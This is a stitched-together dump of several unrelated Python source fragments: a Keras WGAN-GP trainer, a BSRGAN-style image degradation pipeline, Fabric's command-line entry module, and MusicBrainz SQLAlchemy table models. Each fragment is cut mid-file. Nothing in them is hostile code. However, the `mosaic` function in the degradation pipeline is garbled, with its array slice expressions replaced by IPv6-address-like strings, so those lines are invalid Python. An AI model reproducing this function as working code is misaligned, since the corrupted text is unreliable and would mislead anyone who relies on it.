if self.generator.output_shape[1:] != self.image_shape: raise Exception("Invalid image input size for this generator model")
#################################
### Create combined generator ###
#################################
# Create model inputs
gen_latent_input = Input(shape=(self.latent_dim,), name="combined_generator_latent_input")
# Create frozen version of critic
self.critic.trainable = False
for layer in self.critic.layers:
layer.trainable = False
# Generate images and evaluate them
generated_images = self.generator(gen_latent_input)
critic_gen_output = self.critic(generated_images)
self.combined_generator_model = Model(inputs=[gen_latent_input],
outputs=[critic_gen_output],
name="combined_generator_model")
self.combined_generator_model.compile(optimizer=generator_optimizer, loss=wasserstein_loss)
##############################
### Create combined critic ###
##############################
# Create model inputs
real_image_input = Input(shape=self.image_shape, name="combined_critic_real_image_input")
critic_latent_input = Input(shape=(self.latent_dim,), name="combined_critic_latent_input")
# Create frozen version of generator
self.critic.trainable = True
for layer in self.critic.layers:
layer.trainable = True
self.generator.trainable = False
for layer in self.generator.layers:
layer.trainable = False
# Create fake image input (internal)
generated_images_for_critic = self.generator(critic_latent_input)
# Create critic output for each image "type"
fake_out = self.critic(generated_images_for_critic)
valid_out = self.critic(real_image_input)
# Create weighted input to critic for gradient penalty loss
averaged_samples = RandomWeightedAverage(self.batch_size)(inputs=[real_image_input, generated_images_for_critic])
validity_interpolated = self.critic(averaged_samples)
# Create partial gradient penalty loss function
partial_gp_loss = partial(gradient_penalty_loss, averaged_samples=averaged_samples)
partial_gp_loss.__name__ = 'gradient_penalty'
self.combined_critic_model = Model(inputs=[real_image_input, critic_latent_input],
outputs=[valid_out,
fake_out,
validity_interpolated],
name="combined_critic_model")
self.combined_critic_model.compile(optimizer=critic_optimizer,
loss=[wasserstein_loss,
wasserstein_loss,
partial_gp_loss],
loss_weights=[1, 1, critic_gradient_penalty_weight])
# Summary of combined models
print("\nGenerator Summary:")
self.generator.summary()
print("\nCritic Summary:")
self.critic.summary()
# Load checkpoint
self.initiated = False
if load_from_checkpoint: self.load_checkpoint()
# Load weights and override checkpoint loaded weights
if critic_weights: self.critic.load_weights(critic_weights)
if generator_weights: self.generator.load_weights(generator_weights)
# Create batchmaker and start it
self.batch_maker = BatchMaker(self.train_data, self.batch_size, buffered_batches=buffered_batches, num_of_loading_workers=num_of_loading_workers)
# Create some proprietary objects
self.fake_labels = np.ones((self.batch_size, 1), dtype=np.float32)
self.valid_labels = -np.ones((self.batch_size, 1), dtype=np.float32)
self.gradient_labels = np.zeros((self.batch_size, 1), dtype=np.float32)
# Check if datasets have consistent shapes
def validate_dataset(self):
def check_image(image_path):
im_shape = imagesize.get(image_path)
if im_shape[0] != self.image_shape[0] or im_shape[1] != self.image_shape[1]:
return False
return True
print(Fore.BLUE + "Checking dataset validity" + Fore.RESET)
with ThreadPool(processes=8) as p:
res = p.map(check_image, self.train_data)
if not all(res): raise Exception("Inconsistent training dataset")
print(Fore.BLUE + "Dataset valid" + Fore.RESET)
# Create generator based on template selected by name
def build_generator(self, model_name:str):
noise_input = Input(shape=(self.latent_dim,))
try:
m = getattr(generator_models_spreadsheet, model_name)(noise_input, self.image_shape, self.image_channels, self.kernel_initializer)
except Exception as e:
raise Exception(f"Generator model not found!\n{e}")
return Model(noise_input, m, name="generator_model")
# Create critic based on teplate selected by name
def build_critic(self, model_name:str):
img_input = Input(shape=self.image_shape)
try:
m = getattr(discriminator_models_spreadsheet, model_name)(img_input, self.kernel_initializer)
except Exception as e:
raise Exception(f"Critic model not found!\n{e}")
# Linear output for critic
m = Dense(1)(m)
return Model(img_input, m, name="critic_model")
def train(self, target_episode:int,
progress_images_save_interval:int=None, save_raw_progress_images:bool=True, weights_save_interval:int=None,
critic_train_multip:int=5):
# Check arguments and input data
assert target_episode > 0, Fore.RED + "Invalid number of episodes" + Fore.RESET
if progress_images_save_interval:
assert progress_images_save_interval <= target_episode, Fore.RED + "Invalid progress save interval" + Fore.RESET
if weights_save_interval:
assert weights_save_interval <= target_episode, Fore.RED + "Invalid weights save interval" + Fore.RESET
assert critic_train_multip >= 1, Fore.RED + "Invalid critic training multiplier" + Fore.RESET
# Calculate epochs to go
end_episode = target_episode
target_episode = target_episode - self.episode_counter
assert target_episode > 0, Fore.CYAN + "Training is already finished" + Fore.RESET
# Save noise for progress consistency
if progress_images_save_interval is not None:
if not os.path.exists(self.training_progress_save_path): os.makedirs(self.training_progress_save_path)
np.save(f"{self.training_progress_save_path}/static_noise.npy", self.static_noise)
epochs_time_history = deque(maxlen=self.AGREGATE_STAT_INTERVAL * 50)
# Save starting kernels and biases
if not self.initiated:
self.__save_imgs(save_raw_progress_images)
self.save_checkpoint()
print(Fore.GREEN + f"Starting training on episode {self.episode_counter} for {target_episode} episodes" + Fore.RESET)
for _ in range(target_episode):
ep_start = time.time()
### Train Critic ###
critic_loss = 0
for _ in range(critic_train_multip):
# Load image batch and generate new latent noise
image_batch = self.batch_maker.get_batch()
critic_noise_batch = np.random.normal(0, 1, (self.batch_size, self.latent_dim))
critic_loss += float(self.combined_critic_model.train_on_batch([image_batch, critic_noise_batch], [self.valid_labels, self.fake_labels, self.gradient_labels])[0])
critic_loss /= critic_train_multip
### Train Generator ###
# Generate new latent noise
gen_loss = self.combined_generator_model.train_on_batch(np.random.normal(0.0, 1.0, (self.batch_size, self.latent_dim)), self.valid_labels)
self.episode_counter += 1
self.tensorboard.step = self.episode_counter
self.tensorboard.update_stats(critic_loss=critic_loss, gen_loss=gen_loss)
# Show stats
if self.episode_counter % self.AGREGATE_STAT_INTERVAL == 0:
# Save stats
print(Fore.GREEN + f"{self.episode_counter}/{end_episode}, Remaining: {time_to_format(mean(epochs_time_history) * (end_episode - self.episode_counter))}\t\t[Critic loss: {round(float(critic_loss), 5)}] [Gen loss: {round(float(gen_loss), 5)}]" + Fore.RESET)
# Save progress
if self.training_progress_save_path is not None and progress_images_save_interval is not None and self.episode_counter % progress_images_save_interval == 0:
self.__save_imgs(save_raw_progress_images)
# Save weights of models
if weights_save_interval is not None and self.episode_counter % weights_save_interval == 0:
self.__save_weights()
# Save checkpoint
if self.episode_counter % self.CHECKPOINT_SAVE_INTERVAL == 0:
self.save_checkpoint()
print(Fore.BLUE + "Checkpoint created" + Fore.RESET)
# Reset seeds
if self.episode_counter % self.RESET_SEEDS_INTERVAL == 0:
np.random.seed(None)
random.seed()
epochs_time_history.append(time.time() - ep_start)
# Shutdown helper threads
print(Fore.GREEN + "Training Complete - Waiting for other threads to finish" + Fore.RESET)
self.batch_maker.terminate()
self.save_checkpoint()
self.__save_weights()
self.batch_maker.join()
print(Fore.GREEN + "All threads finished" + Fore.RESET)
# Function for saving progress images
def __save_imgs(self, save_raw_progress_images:bool=True):
if not os.path.exists(self.training_progress_save_path + "/progress_images"): os.makedirs(self.training_progress_save_path + "/progress_images")
gen_imgs = self.generator.predict(self.static_noise)
# Rescale images 0 to 255
gen_imgs = (0.5 * gen_imgs + 0.5) * 255
final_image = np.zeros(shape=(self.image_shape[0] * self.progress_image_dim[1], self.image_shape[1] * self.progress_image_dim[0], self.image_channels)).astype(np.float32)
cnt = 0
for i in range(self.progress_image_dim[1]):
for j in range(self.progress_image_dim[0]):
if self.image_channels == 3:
final_image[self.image_shape[0] * i:self.image_shape[0] * (i + 1), self.image_shape[1] * j:self.image_shape[1] * (j + 1), :] = gen_imgs[cnt]
else:
final_image[self.image_shape[0] * i:self.image_shape[0] * (i + 1), self.image_shape[1] * j:self.image_shape[1] * (j + 1), 0] = gen_imgs[cnt, :, :, 0]
cnt += 1
final_image = cv.cvtColor(final_image, cv.COLOR_RGB2BGR)
if save_raw_progress_images:
cv.imwrite(f"{self.training_progress_save_path}/progress_images/{self.episode_counter}.png", final_image)
self.tensorboard.write_image(np.reshape(cv.cvtColor(final_image, cv.COLOR_BGR2RGB) / 255, (-1, final_image.shape[0], final_image.shape[1], final_image.shape[2])).astype(np.float32))
def save_models_structure_images(self, save_path:str=None):
if save_path is None: save_path = self.training_progress_save_path + "/model_structures"
if not os.path.exists(save_path): os.makedirs(save_path)
plot_model(self.combined_generator_model, os.path.join(save_path, "combined_generator.png"), expand_nested=True, show_shapes=True)
plot_model(self.combined_critic_model, os.path.join(save_path, "combined_critic.png"), expand_nested=True, show_shapes=True)
plot_model(self.generator, os.path.join(save_path, "generator.png"), expand_nested=True, show_shapes=True)
plot_model(self.critic, os.path.join(save_path, "critic.png"), expand_nested=True, show_shapes=True)
def load_checkpoint(self):
checkpoint_base_path = os.path.join(self.training_progress_save_path, "checkpoint")
if not os.path.exists(os.path.join(checkpoint_base_path, "checkpoint_data.json")): return
with open(os.path.join(checkpoint_base_path, "checkpoint_data.json"), "rb") as f:
data = json.load(f)
if data:
self.episode_counter = int(data["episode"])
try:
self.generator.load_weights(data["gen_path"])
except:
print(Fore.YELLOW + "Failed to load generator weights from checkpoint" + Fore.RESET)
try:
self.critic.load_weights(data["critic_path"])
except:
print(Fore.YELLOW + "Failed to load critic weights from checkpoint" + Fore.RESET)
self.initiated = | |
<filename>mmedit/datasets/pipelines/bsrgan_degradation.py
import warnings
warnings.filterwarnings('ignore')
import os
from concurrent.futures import ThreadPoolExecutor
import numpy as np
import cv2
from scipy.interpolate import interp2d
from ..registry import PIPELINES
# blur
class BlurKernel2D(object):
def check_kernel(self):
if self.ksize[0] % 2 == 0 or self.ksize[1] % 2 == 0:
raise ValueError(
f'Expect kernel size to be odd (1, 3, 5, etc.), but got {self.ksize}')
def check_input(self, x):
return isinstance(x, np.ndarray) and x.ndim == 3
def __call__(self, im):
if self.check_input(im):
return self.apply(im)
elif im is None:
raise ValueError(f'Encounter None data in {type(self)}')
else:
raise ValueError(f'Expect input image to be 3D-array (HWC), but got {im.ndim}D-array. {type(self)}')
def apply(self, im):
raise NotImplementedError
class IsotropicGaussianBlur2D(BlurKernel2D):
def __init__(self, kernel_size, std):
assert kernel_size % 2 == 1
self.kernel_size = (kernel_size, kernel_size)
self.std = std
def apply(self, im):
if self.check_input(im):
return cv2.GaussianBlur(im, self.kernel_size, self.std, self.std,
borderType=cv2.BORDER_REFLECT_101)
else:
raise ValueError
class AnisotropicGaussianBlur2D(BlurKernel2D):
def __init__(self, kernel_size, var, angle, scale=1):
assert kernel_size % 2 == 1
k_size = np.array([kernel_size, kernel_size])
# Set random eigen-vals (lambdas) and angle (theta) for COV matrix
lambda_1, lambda_2 = var
# Set COV matrix using Lambdas and Theta
LAMBDA = np.diag([lambda_1, lambda_2])
Q = np.array([[np.cos(angle), -np.sin(angle)],
[np.sin(angle), np.cos(angle)]])
SIGMA = Q @ LAMBDA @ Q.T
INV_SIGMA = np.linalg.inv(SIGMA)[None, None, :, :]
# shifting kernel for aligned image
MU = k_size // 2 - 0.5 * (scale - 1)
MU = MU[None, None, :, None]
# Create meshgrid for Gaussian
[X, Y] = np.meshgrid(range(k_size[0]), range(k_size[1]))
Z = np.stack([X, Y], 2)[:, :, :, None]
# Calcualte Gaussian for every pixel of the kernel
ZZ = Z - MU
ZZ_t = ZZ.transpose(0, 1, 3, 2)
raw_kernel = np.exp(-0.5 * np.squeeze(ZZ_t @ INV_SIGMA @ ZZ))
# Normalize the kernel and return
self.kernel = raw_kernel / np.sum(raw_kernel)
def apply(self, im):
return cv2.filter2D(im, -1, self.kernel)
# camera_sensor_noise
# =================================================================================
# unprocess
def prepare_ccm():
matrix = np.array([
[21492, -5753, -3253, 2306, 8110, -425, 7066, 1327, 2068],
[9804, -2699, -1302, -5813, 13164, 3058, -2428, 3065, 8675],
[6847, -614, -1114, -4669, 12737, 2139, -1197, 2487, 6846],
[13510, -6199, -1244, -4430, 12736, 1865, -332, 1443, 5024],
[11511, -4358, -1065, -6524, 13767, 3068, -1467, 1984, 6045],
[7175, -1983, -658, -8075, 15555, 2718, -2171, 2502, 7457],
[7713, -2059, -653, -3882, 11495, 2726, -710, 1332, 5958]
]) / 10000
num_ccms = len(matrix)
xyz2cams = np.array(matrix).reshape(-1, 3, 3)
weights = np.random.uniform(1e-8, 1e8, (num_ccms, 1, 1))
weights_sum = np.sum(weights, axis=0)
xyz2cam = np.sum(xyz2cams * weights, axis=0) / weights_sum
# Multiplies with RGB -> XYZ to get RGB -> Camera CCM.
rgb2xyz = np.array([[0.4124564, 0.3575761, 0.1804375],
[0.2126729, 0.7151522, 0.0721750],
[0.0193339, 0.1191920, 0.9503041]])
rgb2cam = np.matmul(xyz2cam, rgb2xyz)
# Normalizes each row.
rgb2cam = rgb2cam / np.sum(rgb2cam, axis=-1, keepdims=True)
return rgb2cam
def random_gains():
"""Generates random gains for brightening and white balance."""
# RGB gain represents brightening.
rgb_gain = np.random.uniform(2 ** (-0.1), 2 ** (0.3))
# Red and blue gains for white balance.
red_gain = np.random.uniform(1.2, 2.4)
blue_gain = np.random.uniform(1.2, 2.4)
return rgb_gain, red_gain, blue_gain
def gamma_expansion(image):
"""Converts from gamma to linear space."""
# Clamps to prevent numerical instability of gradients near zero.
return np.maximum(image, 1e-8) ** 2.2
def apply_ccm(image, ccm):
"""Applies a color correction matrix."""
ori_shape = image.shape
image = np.reshape(image, [-1, 3])
image = np.tensordot(image, ccm, axes=[[-1], [-1]])
return np.reshape(image, ori_shape)
def safe_invert_gains(image, rgb_gain, red_gain, blue_gain):
"""Inverts gains while safely handling saturated pixels."""
gains = np.stack([1.0 / red_gain, 1.0, 1.0 / blue_gain]) / rgb_gain
gains = gains[np.newaxis, np.newaxis, :]
# Prevents dimming of saturated pixels by smoothly masking gains near white.
gray = np.mean(image, axis=-1, keepdims=True)
inflection = 0.9
mask = (np.maximum(gray - inflection, 0.0) / (1.0 - inflection)) ** 2.0
safe_gains = np.maximum(mask + (1.0 - mask) * gains, gains)
return image * safe_gains
def mosaic(image):
"""Extracts RGGB Bayer planes from an RGB image."""
shape = image.shape
red = image[0::2, fc00:e968:6179::de52:7100, 0]
green_red = image[0::2, fc00:db20:35b:7399::5, 1]
green_blue = image[1::2, fc00:e968:6179::de52:7100, 1]
blue = image[1::2, fc00:db20:35b:7399::5, 2]
image = np.stack((red, green_red, green_blue, blue), axis=-1)
image = np.reshape(image, (shape[0] // 2, shape[1] // 2, 4))
return image
def random_noise_levels():
"""Generates random noise levels from a log-log linear distribution."""
log_min_shot_noise = np.log(0.0001)
log_max_shot_noise = np.log(0.005)
log_shot_noise = np.random.uniform(log_min_shot_noise, log_max_shot_noise)
shot_noise = np.exp(log_shot_noise)
line = lambda x: 2.18 * x + 1.20
log_read_noise = line(log_shot_noise) + 0.26 * np.random.normal()
read_noise = np.exp(log_read_noise)
return shot_noise, read_noise
def add_noise(image, shot_noise=0.01, read_noise=0.0005):
"""Adds random shot (proportional to image) and read (independent) noise."""
variance = image * shot_noise + read_noise
noise = np.sqrt(variance) * np.random.randn(*image.shape)
return image + noise
# =================================================================================
# process
def apply_gains(bayer_images, red_gains, blue_gains):
"""Applies white balance gains to a batch of Bayer images."""
green_gains = np.ones_like(red_gains)
gains = np.stack([red_gains, green_gains, green_gains, blue_gains],
axis=-1)
gains = gains[np.newaxis, np.newaxis, :]
return bayer_images * gains
def pixels_organize(im, scale):
h, w, c = im.shape
im = np.reshape(im, (h // scale, scale, w // scale, scale, c))
im = np.transpose(im, (0, 2, 1, 3, 4))
im = np.reshape(im, (h // scale, w // scale, -1))
return im
def invert_pixels_organize(im, scale):
h, w, c = im.shape
c_scaled = c // (scale ** 2)
im = np.reshape(im, (h, w, scale, scale, c_scaled))
im = np.transpose(im, (0, 2, 1, 3, 4))
im = np.reshape(im, (h * scale, w * scale, -1))
return im
def demosaic(bayer_images):
"""demosaics a batch of RGGB Bayer images."""
shape = bayer_images.shape
shape = (shape[1] * 2, shape[0] * 2)
red = bayer_images[Ellipsis, 0:1]
red = cv2.resize(red, shape)
green_red = bayer_images[Ellipsis, 1:2]
green_red = np.fliplr(green_red)
green_red = cv2.resize(green_red, shape)
green_red = np.fliplr(green_red)
green_red = pixels_organize(green_red[Ellipsis, None], 2)
green_blue = bayer_images[Ellipsis, 2:3]
green_blue = np.flipud(green_blue)
green_blue = cv2.resize(green_blue, shape)
green_blue = np.flipud(green_blue)
green_blue = pixels_organize(green_blue[Ellipsis, None], 2)
green_at_red = (green_red[Ellipsis, 0] + green_blue[Ellipsis, 0]) / 2
green_at_green_red = green_red[Ellipsis, 1]
green_at_green_blue = green_blue[Ellipsis, 2]
green_at_blue = (green_red[Ellipsis, 3] + green_blue[Ellipsis, 3]) / 2
green_planes = [
green_at_red, green_at_green_red, green_at_green_blue, green_at_blue
]
green = invert_pixels_organize(np.stack(green_planes, axis=-1), 2)
blue = bayer_images[Ellipsis, 3:4]
blue = np.flipud(np.fliplr(blue))
blue = cv2.resize(blue, shape)
blue = np.flipud(np.fliplr(blue))
rgb_images = np.concatenate(
[red[Ellipsis, None], green, blue[Ellipsis, None]], axis=-1)
return rgb_images
def apply_ccms(images, ccms):
"""Applies color correction matrices."""
images = images[:, :, np.newaxis, :]
ccms = ccms[np.newaxis, np.newaxis, :, :]
return np.sum(images * ccms, axis=-1)
def gamma_compression(images, gamma=2.2):
"""Converts from linear to gamma space."""
# Clamps to prevent numerical instability of gradients near zero.
return np.maximum(images, 1e-8) ** (1.0 / gamma)
# noise
class NoiseAugmentation(object):
def __init__(self, **kwargs):
self.requires_normalize = True
def check_input(self, x):
return isinstance(x, np.ndarray) and x.ndim == 3
def __call__(self, im):
if self.check_input(im):
require_normalize = (
im.dtype == np.uint8) and self.requires_normalize
if require_normalize:
im = im.astype(np.float32) / 255.
im = self.apply(im)
if require_normalize:
im = (im * 255).astype(np.uint8)
return im
elif im is None:
raise ValueError(f'Encounter None in {type(self)}')
else:
raise ValueError(
f'Expect input image to be 3D-array, but got {im.ndim}D-array. {type(self)}')
def apply(self, clean_data):
raise NotImplementedError
class MultivarGaussianNoise(NoiseAugmentation):
def __init__(self, mean=0., cor_var=None):
super(MultivarGaussianNoise, self).__init__()
assert cor_var is not None
self.mean = np.array([mean, mean, mean])
self.cor_var = np.array(cor_var)
def apply(self, clean_data):
shape = clean_data.shape
noise = np.random.multivariate_normal(self.mean, self.cor_var,
size=shape[:-1])
noisy = np.clip(clean_data + noise, 0., 1.)
return noisy
class ChannelIndependentGaussianNoise(NoiseAugmentation):
def __init__(self, mean=0., std=0.01):
super(ChannelIndependentGaussianNoise, self).__init__()
self.mean = mean
self.std = std
def apply(self, clean_data):
shape = clean_data.shape
noise = self.std * np.random.randn(*shape) + self.mean
noisy = np.clip(clean_data + noise, 0., 1.)
return noisy
class GrayscaleGaussianNoise(NoiseAugmentation):
def __init__(self, mean=0., std=0.01):
super(GrayscaleGaussianNoise, self).__init__()
self.mean = mean
self.std = std
def apply(self, clean_data):
shape = list(clean_data.shape)
shape[-1] = 1
noise = self.std * np.random.randn(*shape) + self.mean
noisy = np.clip(clean_data + noise, 0., 1.)
return noisy
class JPEGCompressionNoise(NoiseAugmentation):
def __init__(self, quality):
super(JPEGCompressionNoise, self).__init__()
self.quality = quality
self.requires_normalize = False
def apply(self, clean_data):
_, encoded_img = cv2.imencode(
'.jpg', clean_data, (int(cv2.IMWRITE_JPEG_QUALITY), self.quality))
noisy = cv2.imdecode(encoded_img, cv2.IMREAD_COLOR)
return noisy
class CameraSensorNoise(NoiseAugmentation):
def unprocess(self, im):
rgb2cam = prepare_ccm()
cam2rgb = np.linalg.inv(rgb2cam)
rgb_gain, red_gain, blue_gain = random_gains()
# Inverts gamma compression.
image = gamma_expansion(im)
# Inverts color correction.
image = apply_ccm(image, rgb2cam)
# Approximately inverts white balance and brightening.
image = safe_invert_gains(image, rgb_gain, red_gain, blue_gain)
image = np.clip(image, 0.0, 1.0)
# Applies a Bayer mosaic.
image = mosaic(image)
metadata = {
'cam2rgb': cam2rgb,
'rgb_gain': rgb_gain,
'red_gain': red_gain,
'blue_gain': blue_gain,
}
| |
<gh_stars>0
"""
This module contains Fab's `main` method plus related subroutines.
`main` is executed as the command line ``fab`` program and takes care of
parsing options and commands, loading the user settings file, loading a
fabfile, and executing the commands given.
The other callables defined in this module are internal only. Anything useful
to individuals leveraging Fabric as a library, should be kept elsewhere.
"""
from operator import add
from optparse import OptionParser
import os
import sys
from fabric import api # For checking callables against the API
from fabric.contrib import console, files, project # Ditto
from fabric.network import denormalize, interpret_host_string, disconnect_all
from fabric import state # For easily-mockable access to roles, env and etc
from fabric.state import commands, connections, env_options
from fabric.utils import abort, indent
# One-time calculation of "all internal callables" to avoid doing this on every
# check of a given fabfile callable (in is_task()).
_modules = [api, project, files, console]
_internals = reduce(lambda x, y: x + filter(callable, vars(y).values()),
_modules,
[]
)
def load_settings(path):
"""
Take given file path and return dictionary of any key=value pairs found.
Usage docs are in docs/usage/fab.rst, in "Settings files."
"""
if os.path.exists(path):
comments = lambda s: s and not s.startswith("#")
settings = filter(comments, open(path, 'r'))
return dict((k.strip(), v.strip()) for k, _, v in
[s.partition('=') for s in settings])
# Handle nonexistent or empty settings file
return {}
def _is_package(path):
"""
Is the given path a Python package?
"""
return (
os.path.isdir(path)
and os.path.exists(os.path.join(path, '__init__.py'))
)
def find_fabfile():
"""
Attempt to locate a fabfile, either explicitly or by searching parent dirs.
Usage docs are in docs/usage/fabfiles.rst, in "Fabfile discovery."
"""
# Obtain env value
names = [state.env.fabfile]
# Create .py version if necessary
if not names[0].endswith('.py'):
names += [names[0] + '.py']
# Does the name contain path elements?
if os.path.dirname(names[0]):
# If so, expand home-directory markers and test for existence
for name in names:
expanded = os.path.expanduser(name)
if os.path.exists(expanded):
if name.endswith('.py') or _is_package(expanded):
return os.path.abspath(expanded)
else:
# Otherwise, start in cwd and work downwards towards filesystem root
path = '.'
# Stop before falling off root of filesystem (should be platform
# agnostic)
while os.path.split(os.path.abspath(path))[1]:
for name in names:
joined = os.path.join(path, name)
if os.path.exists(joined):
if name.endswith('.py') or _is_package(joined):
return os.path.abspath(joined)
path = os.path.join('..', path)
# Implicit 'return None' if nothing was found
def is_task(tup):
"""
Takes (name, object) tuple, returns True if it's a non-Fab public callable.
"""
name, func = tup
return (
callable(func)
and (func not in _internals)
and not name.startswith('_')
)
def load_fabfile(path, importer=None):
"""
Import given fabfile path and return (docstring, callables).
Specifically, the fabfile's ``__doc__`` attribute (a string) and a
dictionary of ``{'name': callable}`` containing all callables which pass
the "is a Fabric task" test.
"""
if importer is None:
importer = __import__
# Get directory and fabfile name
directory, fabfile = os.path.split(path)
# If the directory isn't in the PYTHONPATH, add it so our import will work
added_to_path = False
index = None
if directory not in sys.path:
sys.path.insert(0, directory)
added_to_path = True
# If the directory IS in the PYTHONPATH, move it to the front temporarily,
# otherwise other fabfiles -- like Fabric's own -- may scoop the intended
# one.
else:
i = sys.path.index(directory)
if i != 0:
# Store index for later restoration
index = i
# Add to front, then remove from original position
sys.path.insert(0, directory)
del sys.path[i + 1]
# Perform the import (trimming off the .py)
imported = importer(os.path.splitext(fabfile)[0])
# Remove directory from path if we added it ourselves (just to be neat)
if added_to_path:
del sys.path[0]
# Put back in original index if we moved it
if index is not None:
sys.path.insert(index + 1, directory)
del sys.path[0]
# Return our two-tuple
tasks = dict(filter(is_task, vars(imported).items()))
return imported.__doc__, tasks
def parse_options():
"""
Handle command-line options with optparse.OptionParser.
Return list of arguments, largely for use in `parse_arguments`.
"""
#
# Initialize
#
parser = OptionParser(usage="fab [options] <command>[:arg1,arg2=val2,host=foo,hosts='h1;h2',...] ...")
#
# Define options that don't become `env` vars (typically ones which cause
# Fabric to do something other than its normal execution, such as --version)
#
# Version number (optparse gives you --version but we have to do it
# ourselves to get -V too. sigh)
parser.add_option('-V', '--version',
action='store_true',
dest='show_version',
default=False,
help="show program's version number and exit"
)
# List Fab commands found in loaded fabfiles/source files
parser.add_option('-l', '--list',
action='store_true',
dest='list_commands',
default=False,
help="print list of possible commands and exit"
)
# Like --list, but text processing friendly
parser.add_option('--shortlist',
action='store_true',
dest='shortlist',
default=False,
help="print non-verbose list of possible commands and exit"
)
# Display info about a specific command
parser.add_option('-d', '--display',
metavar='COMMAND',
help="print detailed info about a given command and exit"
)
#
# Add in options which are also destined to show up as `env` vars.
#
for option in env_options:
parser.add_option(option)
#
# Finalize
#
# Return three-tuple of parser + the output from parse_args (opt obj, args)
opts, args = parser.parse_args()
return parser, opts, args
def _command_names():
return sorted(commands.keys())
def list_commands(docstring):
"""
Print all found commands/tasks, then exit. Invoked with ``-l/--list.``
If ``docstring`` is non-empty, it will be printed before the task list.
"""
if docstring:
trailer = "\n" if not docstring.endswith("\n") else ""
print(docstring + trailer)
print("Available commands:\n")
# Want separator between name, description to be straight col
max_len = reduce(lambda a, b: max(a, len(b)), commands.keys(), 0)
sep = ' '
trail = '...'
for name in _command_names():
output = None
# Print first line of docstring
func = commands[name]
if func.__doc__:
lines = filter(None, func.__doc__.splitlines())
first_line = lines[0].strip()
# Truncate it if it's longer than N chars
size = 75 - (max_len + len(sep) + len(trail))
if len(first_line) > size:
first_line = first_line[:size] + trail
output = name.ljust(max_len) + sep + first_line
# Or nothing (so just the name)
else:
output = name
print(indent(output))
sys.exit(0)
def shortlist():
"""
Print all task names separated by newlines with no embellishment.
"""
print("\n".join(_command_names()))
sys.exit(0)
def display_command(command):
"""
Print command function's docstring, then exit. Invoked with -d/--display.
"""
# Sanity check
if command not in commands:
abort("Command '%s' not found, exiting." % command)
cmd = commands[command]
# Print out nicely presented docstring if found
if cmd.__doc__:
print("Displaying detailed information for command '%s':" % command)
print('')
print(indent(cmd.__doc__, strip=True))
print('')
# Or print notice if not
else:
print("No detailed information available for command '%s':" % command)
sys.exit(0)
def _escape_split(sep, argstr):
"""
Allows for escaping of the separator: e.g. task:arg='foo\, bar'
It should be noted that the way bash et. al. do command line parsing, those
single quotes are required.
"""
escaped_sep = r'\%s' % sep
if escaped_sep not in argstr:
return argstr.split(sep)
before, _, after = argstr.partition(escaped_sep)
startlist = before.split(sep) # a regular split is fine here
unfinished = startlist[-1]
startlist = startlist[:-1]
# recurse because there may be more escaped separators
endlist = _escape_split(sep, after)
# finish building the escaped value. we use endlist[0] becaue the first
# part of the string sent in recursion is the rest of the escaped value.
unfinished += sep + endlist[0]
return startlist + [unfinished] + endlist[1:] # put together all the parts
def parse_arguments(arguments):
"""
Parse string list into list of tuples: command, args, kwargs, hosts, roles.
See docs/usage/fab.rst, section on "per-task arguments" for details.
"""
cmds = []
for cmd in arguments:
args = []
kwargs = {}
hosts = []
roles = []
if ':' in cmd:
cmd, argstr = cmd.split(':', 1)
for pair in _escape_split(',', argstr):
k, _, v = pair.partition('=')
if _:
# Catch, interpret host/hosts/role/roles kwargs
if k in ['host', 'hosts', 'role', 'roles']:
if k == 'host':
hosts = [v.strip()]
elif k == 'hosts':
hosts = [x.strip() for x in v.split(';')]
elif k == 'role':
roles = [v.strip()]
elif k == 'roles':
roles = [x.strip() for x in v.split(';')]
# Otherwise, record as usual
else:
kwargs[k] = v
else:
args.append(k)
cmds.append((cmd, args, kwargs, hosts, roles))
return cmds
def parse_remainder(arguments):
"""
Merge list of "remainder arguments" into a single command string.
"""
return ' '.join(arguments)
def _merge(hosts, roles):
| |
Integer, ForeignKey(apply_schema('series.id', 'musicbrainz'), name='series_tag_raw_fk_series'), primary_key=True, nullable=False)
editor_id = Column('editor', Integer, ForeignKey(apply_schema('editor.id', 'musicbrainz'), name='series_tag_raw_fk_editor'), primary_key=True, nullable=False)
tag_id = Column('tag', Integer, ForeignKey(apply_schema('tag.id', 'musicbrainz'), name='series_tag_raw_fk_tag'), primary_key=True, nullable=False)
is_upvote = Column(Boolean, default=True, server_default=sql.true(), nullable=False)
series = relationship('Series', foreign_keys=[series_id], innerjoin=True)
editor = relationship('Editor', foreign_keys=[editor_id], innerjoin=True)
tag = relationship('Tag', foreign_keys=[tag_id], innerjoin=True)
class Tag(Base):
__tablename__ = 'tag'
__table_args__ = (
Index('tag_idx_name', 'name', unique=True),
{'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
)
id = Column(Integer, primary_key=True)
name = Column(String(255), nullable=False)
ref_count = Column(Integer, default=0, server_default=sql.text('0'), nullable=False)
class TagRelation(Base):
__tablename__ = 'tag_relation'
__table_args__ = (
{'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
)
tag1_id = Column('tag1', Integer, ForeignKey(apply_schema('tag.id', 'musicbrainz'), name='tag_relation_fk_tag1'), primary_key=True, nullable=False)
tag2_id = Column('tag2', Integer, ForeignKey(apply_schema('tag.id', 'musicbrainz'), name='tag_relation_fk_tag2'), primary_key=True, nullable=False)
weight = Column(Integer, nullable=False)
last_updated = Column(DateTime(timezone=True), server_default=sql.func.now())
tag1 = relationship('Tag', foreign_keys=[tag1_id], innerjoin=True)
tag2 = relationship('Tag', foreign_keys=[tag2_id], innerjoin=True)
class Track(Base):
__tablename__ = 'track'
__table_args__ = (
Index('track_idx_gid', 'gid', unique=True),
Index('track_idx_recording', 'recording'),
Index('track_idx_name', 'name'),
Index('track_idx_artist_credit', 'artist_credit'),
{'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
)
id = Column(Integer, primary_key=True)
gid = Column(UUID, nullable=False)
recording_id = Column('recording', Integer, ForeignKey(apply_schema('recording.id', 'musicbrainz'), name='track_fk_recording'), nullable=False)
medium_id = Column('medium', Integer, ForeignKey(apply_schema('medium.id', 'musicbrainz'), name='track_fk_medium'), nullable=False)
position = Column(Integer, nullable=False)
number = Column(String, nullable=False)
name = Column(String, nullable=False)
artist_credit_id = Column('artist_credit', Integer, ForeignKey(apply_schema('artist_credit.id', 'musicbrainz'), name='track_fk_artist_credit'), nullable=False)
length = Column(Integer)
edits_pending = Column(Integer, default=0, server_default=sql.text('0'), nullable=False)
last_updated = Column(DateTime(timezone=True), server_default=sql.func.now())
is_data_track = Column(Boolean, default=False, server_default=sql.false(), nullable=False)
recording = relationship('Recording', foreign_keys=[recording_id], innerjoin=True)
